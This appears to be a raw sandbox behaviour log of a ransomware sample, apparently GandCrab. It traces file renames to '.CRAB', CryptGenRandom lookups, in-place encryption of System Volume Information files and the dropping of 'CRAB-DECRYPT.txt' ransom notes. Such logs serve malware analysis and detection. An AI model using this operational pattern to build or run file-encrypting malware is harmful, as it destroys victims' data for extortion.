File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3608 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, size = 3616 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 1488 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, size = 1488 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3016 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, size = 3024 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3608 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, size = 3616 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3304 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, size = 3312 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 1352 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, size = 1360 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppCbsHiveStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppCbsHiveStore\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, size = 272 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, size = 432 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, size = 432 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, size = 432 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, size = 8 True 1
